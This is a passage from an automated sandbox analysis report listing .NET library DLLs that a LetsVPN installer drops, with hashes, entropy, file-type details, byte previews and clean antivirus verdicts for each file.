File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	54248
Entropy (8bit):	6.2657358784437305
Encrypted:	false
SSDEEP:	1536:4r59g98C87KHeBUbwgKirbdwMRTzAt9lvAwrxv:4r5HC87rUbwgKirJw1DlvhF
MD5:	5F912B02B5018CDBD77E3F6135DE9E52
SHA1:	60D764249C80D53BD6E231F65C9DA4639E54037E
SHA-256:	916AE6CDA1296A87744B4899B4045E7808C836953FF571206389D8BE3DB94C24
SHA-512:	91990A0BF9883F68A96C03F03B2B469CB2010DC0D2C07C683E336E038B18478474999E387CFDFDAE2D5CBAC5443429E2075F7FE60996D4CEDBA26A5E6E308533
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u-..........." ..0................. ........... ....................................@.....................................O.......`................+..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...`...........................@..@.reloc..............................@..B.......................H........a..x\..................@.........................................(....:...(....(....&...(...."..(...."..(...."..(......(.....0..,........o....o......o.....jo.....o.....o.....o......s....}.....s....}.....s....}......2}.....(.....s4...}....b.{.....o ....{....o!...b.{.....o"....{....o#...6.{.....o$....0..-........{....,.s%...z................s.......(.......{....,.s%...z.{....-..s&...}.....{......sS...o'.....{....,.s%...z.{.....o(.......oU...*..{....,.s%..

C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Pdb.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	100328
Entropy (8bit):	6.409382993059922
Encrypted:	false
SSDEEP:	1536:6U2qJ+RazRt/Kc4oJiOxFR4NdJF0/RfhF46HAoYKHgPzpS6w7fa1C9rYAwrx6a:d2MRtrfrR+Pe/xAiAzpQ7y1C9rYhz
MD5:	4851542D15F473DFEEC7B33A4F32C8C7
SHA1:	75CBD86A12D6B6083DA3E9E4E758B0839F8EDA7F
SHA-256:	3B3A2F33D6F7578FC3F76E9013F7FBBB7049DD91A2E7F0943427385C03D7A354
SHA-512:	3F11406FCA0135EF0F32EC2314B9419A03B9C3ACA5712D3C1774AAE3CA6B1999BEC8C742057D6A2DCA2CB5D6583CF713B676E8C9BE36E844CFDBA7B27BE899A0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rd..........." ..0..T...........q... ........... ..............................P.....@.................................eq..O.......`............\...+...........p..T............................................ ............... ..H............text....S... ...T.................. ..`.rsrc...`............V..............@..@.reloc...............Z..............@..B.................q......H.......<s.......................p......................................:.(......}......{....-...{....(.....{......o......{....-...{....(.....{......o........0..a........s....}.....s....}.....o....o.....+(.o......{.....o.......(.....o......(.....o....-....,..o..............".4V.......0..J........o....o ....+"..(!.....{.....o.......(.....o".....(#...-...........o.....*........../;.......s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$.

C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Rocks.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38888
Entropy (8bit):	6.463590680052079
Encrypted:	false
SSDEEP:	768:O+meiCyrXOwS8uRssveum1peFLHFBbOlAw/KENAMxmu:VyrewFassveuPbBClAwrxmu
MD5:	5E8A53A04F7ABE9AB061B37DEEC8511D
SHA1:	5C311F2CC04C39B0513756666C927D9314BDC311
SHA-256:	1CBE439C581945DEBCEE01F878FE8BED6AD656DBA0EA292D50673382DB23BBC1
SHA-512:	40291DA82EB567EA2EA55B281DD531CCD5265845988F542A966E1A082E0DC3D7CD8E3A0A003DA43B789822A6A775C3EB522DEBA523A73E1B702663DE510E422A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i............" ..0..d............... ........... ............................... ....@....................................O.......l............l...+..............T............................................ ............... ..H............text...4c... ...d.................. ..`.rsrc...l............f..............@..@.reloc...............j..............@..B........................H.......,A..\@..........................................................J.(.....s....}......F.(......E.(....z.{.....To.....:o....&...(.....0..a.........M.(.....o....,,.{.....`o.....`o....&.{.....o....o....o....&.o....,...o....(.....(....,...(......-.r...ps ...z.o!...,%.o"...r...p(#...-..o"...r#..p(#.....n.{.....~o....&..o$...(....z..P.(.....o%...,...o&...(......{.....(o....&.........s'...(...+.{.....)o....&*..0..3........o(.......YE........3...........m...&...`...

C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	356328
Entropy (8bit):	6.244422689325779
Encrypted:	false
SSDEEP:	6144:yFzzF5VOCxfiKKhsw4NiL0XRzx9WoCklyusbhpn:adfiKI4RzWSyuCpn
MD5:	01BA6600DBA7BD569BB0958221B04F71
SHA1:	5091DDB5E431E18FA6CBAB16E052EE683A7491F7
SHA-256:	5A4A92EC8FF9C0A8B0502B38E89EAF5398205DBD23C87DBED2D77B7B390477B8
SHA-512:	57C8A6B04B2BB4D4C7C98D55871237D010877D8213DDD6A934AA44E37F50974DF9CCD0910A164045CEA18D7572C09CFD18EDAB2CC54E371714FF2093984EE6D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i.}..........." ..0..<...........Q... ...`....... ..............................'.....@..................................Q..O....`..H............D...+...........P..T............................................ ............... ..H............text....:... ...<.................. ..`.rsrc...H....`.......>..............@..@.reloc...............B..............@..B.................Q......H........b..@...................DP......................................"..s0..."..s0...>..}1.....}2.....{1....O...,..{2...,..{1....O...o&...2..O....3...6.r...p.(4.....(5.....}6......i.O...}7....{6....{7.....i(8.....}9...2....i.(:...>..s;.....(<...V..{7....{6.....(=.....0..1..........Y./....X.[......(=.........(=..........(>.......0.._..............+P.../5.../..{9......O......O...o?....0.....%.X..O....O...+.....%.X..O....O.....X....2.*z...X...b...X...b`...X..b`...

C:\Program Files (x86)\letsvpn\app-3.7.0\Newtonsoft.Json.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	711144
Entropy (8bit):	5.963920130457662
Encrypted:	false
SSDEEP:	12288:LBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUlN:LBjk38WuBcAbwoA/BkjSHXP36RMGqN
MD5:	CD19379184933C8468A024589A8128C6
SHA1:	7A51DB0EA0963247BAF5B84A53C2E5C3C43DD23E
SHA-256:	DBF453EC23731D025844C860471C82ECFE97A0398D218E0C3776C45008DE2D26
SHA-512:	BF4B7D3B798BD8D46843BB31975822BE65DA36A1F029D5CC6EF196D82FD6A53A042F71BE806C993E4D78A299DEDAE241081D5DE9129A576BF1D6F3D5C43AED34
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... .......w....`....................................O........................+.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(......(....^.(...........%...}....:.(......}....:.(......}......(....:.(......}......{......(......(....:.(......}......{.....(.............}.....(......{.....X.....}......0...........-.~.....~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..\|....(......._..{........+,..{\|....3...{{......(....,...{{.....{}.......-.....0...........-.r...ps....z.o......-.~.....~....

C:\Program Files (x86)\letsvpn\app-3.7.0\NuGet.Squirrel.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	521192
Entropy (8bit):	6.045616558098013
Encrypted:	false
SSDEEP:	6144:TRKflaWVRA6+LX9c1t3HpbOmhYIeDUQjcaPlq1fQx7NqEaElDp3sL2blV/VyUd9J:TRt6+A1pbOsBQAa4f0pWSbb+1ikju
MD5:	D0FB51F0061ECBAA41B19352E1F6997C
SHA1:	C7BA87D90941451D01E920825949EB9556640F5B
SHA-256:	864975ADDAD8B55B715CDBE05DF4490DA07001A017464A61C36FDB69D9D1C320
SHA-512:	3E5C00370D012F35EF2324770D32CD030E0D0664821DAF074EC267EA83E0D05A3E9D7E6B58229B86192E53E0E5BD637F6801199DE4D54200F35E9BD00474F43F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....p_.........." ..0.................. ........... ....................... ............`.....................................O........................+........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Xw...............r...i............................................{E.....{F...V.(G.....}E.....}F......0..;........u1.....,/(H....{E....{E...oI...,.(J....{F....{F...oK..... .... )UU.Z(H....{E...oL...X )UU.Z(J....{F...oM...X.0..b........r...p......%..{E......%q4....4...-.&.+...4...oN....%..{F......%q5....5...-.&.+...5...oN....(O.....{P.....{Q...V.(G.....}P.....}Q....0..;........u6.....,/(H....{P....{P...oI...,.(J....{Q....{Q...oK..... .2;. )UU.Z(H....{P...oL

C:\Program Files (x86)\letsvpn\app-3.7.0\PusherClient.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53736
Entropy (8bit):	6.293200989875825
Encrypted:	false
SSDEEP:	768:72xghQUndJrmbnJAM6LjB4Mz5k+/FdS0/MuLs/09P2XAw/KENAMxagq:7GghQaJiFAMAhH/Dw/09OXAwrxo
MD5:	D194499A718694BBC382BCF74C84DEBF
SHA1:	19FCD65F44A2CAE3A3CFE693AA8F026AFC75DEAA
SHA-256:	7C70367AF1E84DC33A248054AC9CD17065E769790B7ED5AD66CB34D4F41CA55F
SHA-512:	4A8FC901F0A45419E22E569ACDACF430D0B9877ACA64032FF467B43056F46D5FB9EAD62C185BE34CBA21829E24101EA29D94BC8F712B02B35A6EB079BE9B4186
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0................. ........... ...............................l....`.....................................O.......D................+..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...D...........................@..@.reloc..............................@..B.......................H........M...o............................................................{......{......{....r.(......}......}......}........0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o.......0..K....... ..,. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X..0..{........r...p......%..{.............-.&.+.......o ....%..{.............-.&.+.......o ....%..{.............-.&.+.......o ....(!.....{"...:.(......}"......0..#...

C:\Program Files (x86)\letsvpn\app-3.7.0\SQLite-net.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	104424
Entropy (8bit):	6.208499781200954
Encrypted:	false
SSDEEP:	1536:xdAKzGN0ifSJxFlm+FpoHloqUIdmJlllf07gllfUzb1kUyN1e/rWhsCMbdynBQAu:hbcl5mJlllf07gllfUzb6W/+b+OQhdR
MD5:	25ED2EE8D2A675AA955F33CAB636E1AB
SHA1:	FFAFF053B438C161527E350D42BDB10ABA3032BB
SHA-256:	47FDBC68646272D69C22117F0CF80A04D7A5920B8EC255BAA1E331AB33EF4D43
SHA-512:	A8BAFC715468B233252CED53F5301FC527D503A9A303B4495578C8E5610A0AA8ED159BDEF0615D34CBB9365F90D123CF535120F3D31D9EF0EECBD14C267F2D7A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#............" ..0..b..........&.... ........... ..............................u.....`.....................................O....................l...+........................................................... ............... ..H............text...,`... ...b.................. ..`.rsrc................d..............@..@.reloc...............j..............@..B........................H.......@...x.............................................................{...."..}....>..(......(...."..s......{...."..}..........(......0..?.......s........}\|......(.....,%.{\|...,...o...........s....(...+(...."..s....*....s....R.o.....o......s......{...."..}......{!..."..}!.....{"..."..}".....{#..."..}#.....{$..."..}$.....{%..."..}%.....{&..."..}&.....{'..."..}'.....{(..."..}(.....{)..."..})...rs................. ...(......0..................

C:\Program Files (x86)\letsvpn\app-3.7.0\SQLiteNetExtensions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48616
Entropy (8bit):	6.233289942282731
Encrypted:	false
SSDEEP:	768:fqRdLDFPhe5rHMgWVCMlh8Xlrmyac4yPeZrZ3rAw/KENAMxUP:fqRdL3e5rHMgWVTnyac4oeZrZ3rAwrxm
MD5:	C61BED81031664A04615FA8E339D7F3F
SHA1:	10255DD6E08401651BE73F44EE8C1294A2EBB3DB
SHA-256:	699B8E0D5A53D9CD2B6C297F3F22B73AEFCE357D18D8460F5620367530163117
SHA-512:	9BEA999CC3C280BE177BD76F9E75B40D2988B531022614475FEE4EE6C592495BC147E66DC50F22A35D2C038EE599D7B6F444BB8810DC7B093C644B69680B93C8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:. Z.........." ..0.................. ........... ...............................I....@.....................................O.......L................+..........\|................................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B.......................H........K...Y............................................................{......{....V.(......}......}.......0..;........u......,/(.....{.....{....o....,.(.....{.....{....o...... ...E )UU.Z(.....{....o....X )UU.Z(.....{....o....X.0...........r...p......%..{.....................-.q.............-.&.+.......o.....%..{.....................-.q.............-.&.+.......o.....(......{...."..}......{...."..}......ra..p......%...%...%...(....( ......0..M........o...+..,...

C:\Program Files (x86)\letsvpn\app-3.7.0\SQLiteNetExtensionsAsync.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24552
Entropy (8bit):	6.577215048741679
Encrypted:	false
SSDEEP:	384:390wriHD7R3d4Q5ENmiL31SAAh1OSxJJssUJqgG/232nd4l4ueR8pwKANynsAw/m:t0w2j7R3d4Q5ENmiL31SAAh1OSxJJssK
MD5:	DF2B552517DFECF5D14AC9E6D929E5C4
SHA1:	E83E58A062FAC0EC00F119FD25A979C2BC658BE7
SHA-256:	FB72CD95421333B5B95323B845D47F1BB9A141717F6BD65DAC8AC4943AD6473C
SHA-512:	56BE9BCEE791CC87993BE1A4DCF599C09F7C966ED453486DDA163461EE799B0EFA2E73F7CAAD5B4C02FAFA8EF1F9647F0CB9B055818D57BFBA0FFC595315ABF0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g..........." ..0.............H... ...`....... ....................................@..................................G..O....`..\|............4...+...........F..T............................................ ............... ..H............text....(... ..................... ..`.rsrc...\|....`.......,..............@..@.reloc...............2..............@..B.................G......H.......8)...............................................................0..:.......s.......}......}......}......}...........s.....{....(...+...0..:.......s.......}......}......}......}...........s.....{....(...+...0..:.......s.......} .....}!.....}".....}#......$...s.....{ ...(...+...0..:.......s%......}&.....}'.....}(.....}).........s+....{&...(,......0..B.......s-.......}......}/.....}0.....}1.....}2......3...s+....{....(,...F...(...+...(...+*.0..B.......s5.......}6.

C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.batteries_v2.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.8204171824466115
Encrypted:	false
SSDEEP:	384:o6x4u20pwKANynsAw/98E9VF3AM+ouJhPL:oEoAw/KENAMx81L
MD5:	4416E30C112ECB4136C824C941D77B5F
SHA1:	0F621BC7D93752473DB7D46DD7F83E568EA02094
SHA-256:	AE70D745712E69F4D52120262FA75FB068EB904494EF7D93AB02677C63D55529
SHA-512:	82CB0259A7F711A8A59C656DB5F00A6DC29658468154ACD32CA6A57664155321E5B6FDA5E00118CF21A60B28BA0F9FFD522A2733743A906AE376B85434B2278D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............,... ...@....... ..............................3.....@..................................+..O....@..X................+...`.........T............................................ ............... ..H............text........ ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................+......H........ ..<...................(.......................................(......0...............(....o........(....s.......0............(.......(....s....(....2r...p.(....:.(......}.......0...........{.......(....,..~....*BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID.......p...#Blob...........W..........3..........................................................9.........[...............................c.....c...{.c...>.c.....

C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.core.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	57832
Entropy (8bit):	6.288628643041189
Encrypted:	false
SSDEEP:	768:00GhwEvUmz5IR5tUe9CiXmEkzKeGIsNif11gNsNj8cIjqabdAw/KENAMxLo:WlIR56kCckz2DhiNIchabdAwrxLo
MD5:	8CC90AC3DF5B242BC1B6C139471636AD
SHA1:	4CFD6FD66F175965F88EEDBF0606257045DFFF96
SHA-256:	5D09A954FB3B731FD2C98E813383878DCA0DBD50FE8A077982B34121FF7CFB25
SHA-512:	5125304805504F381E6ED2B654F21E3A371D1C8D8992011874163A788A642F4D5049B12D8E914E879ED3105977057B411CBE7229D0759BF4389A60F83D4D2C62
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d............" ..0.............B.... ........... ....................... .......F....@.....................................O.......(................+..............T............................................ ............... ..H............text...H.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................".......H........=.....................t.........................................(......(......(...........Z~....,..o...&.............b~....-.r...ps....z~.....(#...o ....0..........(#......o!.....(....Q6.(.....(%....0..........(#........o".....(....QR.(.......(....('...:(#......o'...N.(.....(.....()...2(#....o#...2(#....o$.....o......o....2(#....o%...2(#....o&...6(#.....ok......0..........s.......}.....{....-...+........s.......(1...6(#.....ol...*6..(....(3..

C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.nativelibrary.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20968
Entropy (8bit):	6.699045541869867
Encrypted:	false
SSDEEP:	384:obX0gijditBKMBRBHsEQO7pwKANynsAw/98E9VF3AM+oHIE0yOk:obkVRiBB8fAw/KENAMxos
MD5:	AE6F980FE42E63162BD1AB7D94F5199F
SHA1:	6B2439C5223E183B38978FD3E038098D752D8E01
SHA-256:	41DE3C76987D109A780739466F04170A40F1F56BFF85D303A977E97EDBC351EE
SHA-512:	03BF0B8C15E1FCBA3D82A0BF7121F973512DF9774D27DF2AB07C6B434374E506E90A878920392A809EC1118FBB521C1FCC5C695CE3EF834E5AED23940A24C227
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D............" ..0..............:... ...@....... ..............................].....@.................................X:..O....@..d............&...+...`......L9..T............................................ ............... ..H............text........ ...................... ..`.rsrc...d....@......................@..@.reloc.......`.......$..............@..B.................:......H........%.......................8.......................................0..K..........~....%-.&~..........s....%.....(....%~....(....,.r...p.r...p(....s....z..0..#.......(......-...(......3...(....s....z...(....%~....(....,.r)..p.r...p(....s....z..0..#.......(......-..(....&..3..(....&s....z..0..7..........~....%-.&~..........s....%.....(.........~....(......0............(.........~....(......E................+$r9..p.(....rI..p.(....rc..p.(....*s....z...0..........

C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.provider.dynamic_cdecl.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68072
Entropy (8bit):	6.049924534036129
Encrypted:	false
SSDEEP:	768:lMXMG2QW0RgqGlel80eX3xFhofnnN+HHHHns6sbEpyqJW6N0dAw/KENAMxWcl:W2UTGlel80eXSfnUnM6sbwXN0dAwrxWw
MD5:	26245B224B16C166E34E0A661955967F
SHA1:	FE19DAA54D713BA1C1D4A2ED53C917823DE489CC
SHA-256:	DC15D11946CBD1A3AC40925AD882F1256447B89BD7D0B07293C93FA7F80892FB
SHA-512:	16DBD1C9443A140A04BE4B39B83EA1E28A73842C35430213506A12576B5808D7A6834A64D9895C0F7A54AA8BC8D72FB1AEE5C07BC2B8CF9D0D2DD7FA0B01D592
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0.................. ........... .......................@......a.....@.................................R...O........................+... ......4...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......dB..P...........................................................6.......(.....~....F~H......on......N........s....o...+..0............(........~......o.....0............(........~I.....or....0..%.........(..........(........~J.......ov.......0..H.........(..........(........~K....oz............(....(.........{........o....2~#....o....2~"....o....2~F....of...6~G.....oj...:~H......on...2~$....o....2~%....o....>.(.......o.......0..N........,........s.....

C:\Program Files (x86)\letsvpn\app-3.7.0\SharpCompress.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	465384
Entropy (8bit):	6.220618457714342
Encrypted:	false
SSDEEP:	6144:GcGv7iCPwqEYosfdBtmXaxWoXY06nQk2zLRC+oRZkR4CDy2sqIT0czXYhlmW:a+CoCoCBtmXWnL6nd2ZiUR4WylT0q+l9
MD5:	0EAF9C30663A37A1439B910E81998F26
SHA1:	E22B93C32221F94826408527E9140CE4B652D673
SHA-256:	97B9453A756E2F68DAFF234ABE454EB761834E8AB33802C7C9A110CC83097DDE
SHA-512:	60020C564BACF440F347676F1E70721CB1EE1392C2114021EB85BD36DF959897FE929023752D7F0C969C5E083E9ECD9F52473C15F2CE8867FBDBA3FF1A55E732
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._]..........." ..0.............v.... ... ....... .......................`.......]....`.................................$...O.... ...................+...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................X.......H........f..D[............................................................(G..."..(H...&...(I.....(...."..(....&...(....r.,.~......~...... ...._X..n.,.~.....~...... ...._X..R..2.~.... .....X..F..2.~.....h.X..R..2.~.... .....X..R..2.~.... .....X...0..A.........{.......a}......{.......a}......{.......a}......{.......a}........0..(..........?_d....1...n_....{.....Y.?_b`.{...._.0..@..........{.......(....}.......{.......(....}.......{.......(....}....*.0..5...

C:\Program Files (x86)\letsvpn\app-3.7.0\Squirrel.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	278504
Entropy (8bit):	6.051539256474112
Encrypted:	false
SSDEEP:	6144:9bwZzM/arIPizbgQtYYYncnWDOsksHgtBwsbe+/ubhg:mzM/arIPizxUncQfZH7g
MD5:	9DD11CCB6AD5E68B47F7145EF2398513
SHA1:	E8A3FB83E34516CABF8A04DE0658CE9D184751B2
SHA-256:	59D8C72994391AE5AF2E261918055C04F843A4CD193C8F010F509E2FE27E6B3B
SHA-512:	D2A0C07EC1D4E658E0D99DD9326F79CE652A8A1EFBC530890CF9AECC62B984535DBE28D887E04A3692F088FFFE5A5DFF8284F1C3F759EB45A9636092ECA54E0E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ...@....... ....................................`.................................e..O....@...................+...`......x)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.......................H.......X... .............................................................{0.....{1...V.(2.....}0.....}1......0..;........u......,/(3....{0....{0...o4...,.(5....{1....{1...o6..... ... )UU.Z(3....{0...o7...X )UU.Z(5....{1...o8...X.0..b........r...p......%..{0......%q.........-.&.+.......o9....%..{1......%q.........-.&.+.......o9....(:...V!..../c...s;..........{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......(2.....

C:\Program Files (x86)\letsvpn\app-3.7.0\SuperSocket.Clientuser.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53224
Entropy (8bit):	6.1911084320327205
Encrypted:	false
SSDEEP:	768:MDGXmBiIOJv2IIXs4UOPhbY+m/rihAt5A8o4/aBS8XpTt/yO0yFtAw/KENAMxHl:MDGXmBiXanx+zehk/WpB/yO0yrAwrxHl
MD5:	53B6BC74F76CF41B93EA8CE98B3E0AAB
SHA1:	BEC0CC1B8C65B6045E359AA509DCDC5D354D0B47
SHA-256:	0F9779F08B4EC49BB884C7B2784268AEC1108A3A9E97FD6FF6628BA5C7AF2929
SHA-512:	2A1C67AC8166B5EB9D7641653C7A8DBB831B61FEAEA6638470DB552B8B4BB0CE55C2FAFBAD5F139CCA126DC32A8388141FE5AD46C64D34EC623592B274D53FF7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h@qZ.........." ..0.............~.... ........... ....................................`....................................O........................+........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................^.......H........O...g..................(.......................................&...(....6.......(....:........(.......~....%-.&~..........s....%.....(......0..@........(....s.......o......}.....s....}.....{......i.....o......}.....0..............(.....`,........0..Q.........R.{....u......o......{ .......i2...R...{........\| .....X.(!....................0..............("....`,........0............R.{....u......o......{ .....o#......X......i1...R...{........\| ......(!.....

C:\Program Files (x86)\letsvpn\app-3.7.0\System.AppContext.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.868995697038425
Encrypted:	false
SSDEEP:	384:5DNxWQFWZLpwKANynsAw/98E9VF3AM+o1MTurx:5DNV3Aw/KENAMxKC
MD5:	590803CA6E22888F80D0B49BEC315C3A
SHA1:	1030CE4C1C1E3E9A591195C1CEA702715CE9CAB5
SHA-256:	BC6C2FA37D1890C3D164E92478BA83FAA22D7A348550AD095296ABB195D1416C
SHA-512:	B612F5DEEB092F453A4CBD4F5052E09CCDF02D331E8FE593613091E564A83B9653276AEAA785717F1CF61A97E9DD822FE638DF98D7679E3438DDD00C2BA43F56
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0.............f(... ...@....... ....................................@..................................(..O....@...................+...`.......&............................................... ............... ..H............text...l.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................H(......H.......P ......................\&......................................BSJB............v4.0.30319......l...\|...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.....K.N...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Buffers.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23016
Entropy (8bit):	6.722097829825641
Encrypted:	false
SSDEEP:	384:vrMdp9yXOfPfAxR5zwWvYW8a+YpwKANynsAw/98E9VF3AM+oSrWKb7kZL:vrMcXP6zAw/KENAMxXv9
MD5:	A02D9353B59A4751F8AEA5C46BD01906
SHA1:	FC1D3BAAF9CABD5B0356207A38D703471F39B8EB
SHA-256:	F95E7C7D6D4EB85D4B3745C69E72EAEE76BABA707611B917417AAAC6B8C8EF94
SHA-512:	C16F1866E131E2BCB713EF7701C9E7C695E25764DAA03CDE7888B141129F0F71266CF8B163B048415E4404D87648198B6EC09D7D7D3C520FB8E8E8B93A087F29
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
